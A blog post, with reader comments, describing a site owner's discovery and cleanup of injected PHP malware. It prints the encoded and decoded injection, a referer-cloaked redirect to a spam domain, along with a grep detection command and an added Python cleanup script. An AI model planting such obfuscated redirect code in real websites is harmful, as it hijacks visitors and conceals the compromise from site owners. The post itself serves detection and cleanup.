
Damn you Hackers!!! Go to Hell!!!

So today, I noticed another hack that has been installed on my machine. I have to say that ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number 3. The reason I am posting about this one is that it is actually pretty interesting, and finding out what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my Project 365 page to post automatically to my website. This is when I first noticed a slowdown and issues when I was using the debugger from Facebook. At first I thought it was the WordPress plugin, but it occasionally works. I got everything ready and posted my first auto post, and strange things started to happen.

As I stated, everything looked normal at first, until I clicked on the links provided by Facebook. When I clicked on the Facebook link to my website, it went to some spam site. At first I thought it was the .htaccess hack that I received a while back, but that was not the case. Then I thought maybe it was a DNS hack. That was also not the case. Finally, I found the following in all the .php files on my web server.

It uses the eval command nested with base64_decode on the following block of code:

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ

It is quite clever. Because the code is base64-encoded, people may easily overlook it, but when you decode the text this is what you get:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
                or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
                or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
                or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
                or preg_match("/google\.(.*?)\/url\?sa/",$referer)
                or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://minkof.sellclassics.com/");
                    exit();
                }
            }
        }
    }
}

Tricky, huh? Notice what it checks before redirecting: no output headers have been sent yet, the browser is not IE 7, and the referer is a search engine, a URL shortener or a social network (Facebook included). Visitors who type the address in directly, or who arrive from anywhere else, get the normal page, which is why the site kept looking fine and the redirect only showed up on the links coming from Facebook. The error_reporting(0) at the top keeps PHP from printing anything that would give it away.

So, well... the solution? Remove the injected code from all the .php files. With a little help from grep I was able to locate all the bad code:

grep -H -r 'eval(base64_decode' ./
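The grep above finds the injection, but it still leaves you decoding each blob by hand and editing every file. The following script is an added example, not the post author's code: it walks a directory, locates each eval(base64_decode(...)) call, decodes the payload (restoring the base64 padding the injector drops, as in the blob above), reports the redirect target and the referer strings the cloak looks for, and with --write strips the injection while keeping a .bak copy. The infected sample at the bottom is constructed for the example and points at a placeholder domain; the regex shapes are assumptions about how this family is embedded, not something taken from the post.

```python
"""Triage and clean eval(base64_decode(...)) injections in PHP files.

Added example, not the post author's code. The sample data at the bottom
is constructed for illustration and points at a placeholder domain.
"""
import base64
import re
import sys
from pathlib import Path

# eval(base64_decode("...")) with either quote style, optional whitespace and
# an optional trailing semicolon. Group 2 is the base64 text. (Assumed shape.)
INJECTION_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+?)\1\s*\)\s*\)\s*;?""",
    re.DOTALL,
)
# A PHP block left empty once the injection is removed.
EMPTY_PHP_RE = re.compile(r"<\?php\s*\?>\n?")
LOCATION_RE = re.compile(r"""header\s*\(\s*['"]Location:\s*([^'"]+)['"]""", re.I)
REFERER_RE = re.compile(r"""stristr\s*\(\s*\$referer\s*,\s*['"]([^'"]+)['"]""", re.I)


def decode_payload(b64: str) -> str:
    """Decode the base64 text of an injection into PHP source.

    The blob is usually wrapped across lines and often lacks '=' padding,
    so whitespace is removed and padding restored before decoding.
    """
    compact = re.sub(r"\s+", "", b64)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("latin-1")


def summarise(payload: str) -> dict:
    """Pull the redirect target and referer trigger strings out of a decoded payload."""
    loc = LOCATION_RE.search(payload)
    return {
        "redirect": loc.group(1).strip() if loc else None,
        "referer_triggers": REFERER_RE.findall(payload),
        "silenced_errors": "error_reporting(0)" in payload,
    }


def find_injections(source: str) -> list[dict]:
    """Return one summary per eval(base64_decode(...)) call found in PHP source text."""
    findings = []
    for m in INJECTION_RE.finditer(source):
        try:
            payload = decode_payload(m.group(2))
        except ValueError:  # not valid base64: still report the location
            payload = ""
        info = summarise(payload)
        info["span"] = m.span()
        findings.append(info)
    return findings


def strip_injections(source: str) -> tuple[str, int]:
    """Remove every injection call; return (cleaned source, number removed)."""
    cleaned, count = INJECTION_RE.subn("", source)
    return EMPTY_PHP_RE.sub("", cleaned), count


def clean_tree(root: Path, write: bool = False) -> dict[str, list[dict]]:
    """Scan every .php file under root; with write=True, strip injections and keep a .bak copy."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        source = path.read_text(encoding="latin-1")
        findings = find_injections(source)
        if not findings:
            continue
        report[str(path)] = findings
        if write:
            path.with_suffix(path.suffix + ".bak").write_text(source, encoding="latin-1")
            path.write_text(strip_injections(source)[0], encoding="latin-1")
    return report


# Constructed sample: a cloaked redirect in the same shape as the one in the
# post, pointing at a placeholder domain, embedded with its padding dropped.
SAMPLE_PAYLOAD = (
    'error_reporting(0);\n'
    '$referer=$_SERVER["HTTP_REFERER"];\n'
    'if (stristr($referer,"google") or stristr($referer,"facebook.com")) {\n'
    '  header("Location: http://spam.example/"); exit();\n'
    '}\n'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode().rstrip("=")
SAMPLE_ORIGINAL = '<?php\n// original file\necho "hello";\n'
SAMPLE_INFECTED = '<?php eval(base64_decode("' + SAMPLE_B64 + '")); ?>\n' + SAMPLE_ORIGINAL

if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if a != "--write"]
    if not args:  # no directory given: show the report for the constructed sample
        print(find_injections(SAMPLE_INFECTED))
    else:
        for path, findings in clean_tree(Path(args[0]), write="--write" in sys.argv).items():
            for f in findings:
                print(f"{path}: redirect={f['redirect']} triggers={f['referer_triggers']}")
```

Run it with no arguments to see the report for the constructed sample, with a directory to scan that tree, and add --write to clean it. Note what it does not do: it will not catch injections wrapped in gzinflate() or split across variables, and removing the code does not close the hole that let it in, so rotating the hosting and WordPress passwords and checking what else was modified still has to follow.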

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

4 comments to Damn you Hackers!!! Go to Hell!!!

  • Rebecca

    Wow that’s scary! Are you going to change to a different host? I hope my website never gets hacked!

  • I am on such a good deal with GoDaddy right now, it is very hard for me to change. I will ride this out until the end of my current contract and move host. Meanwhile, I got to put my degree to some use, right?

  • Kim

    thank you SO much for posting this. The same thing has been happening to my website; only on facebook. I am technically challenged so I need to forward your advice to someone with some knowledge. I do appreciate you posting it though.

  • My advice is to change the password to your blog account ASAP and then start looking for the bad scripts. Your hosting service may have a way to see which files have been changed. If it is only on Facebook, it is probably exactly the same problem that I had.
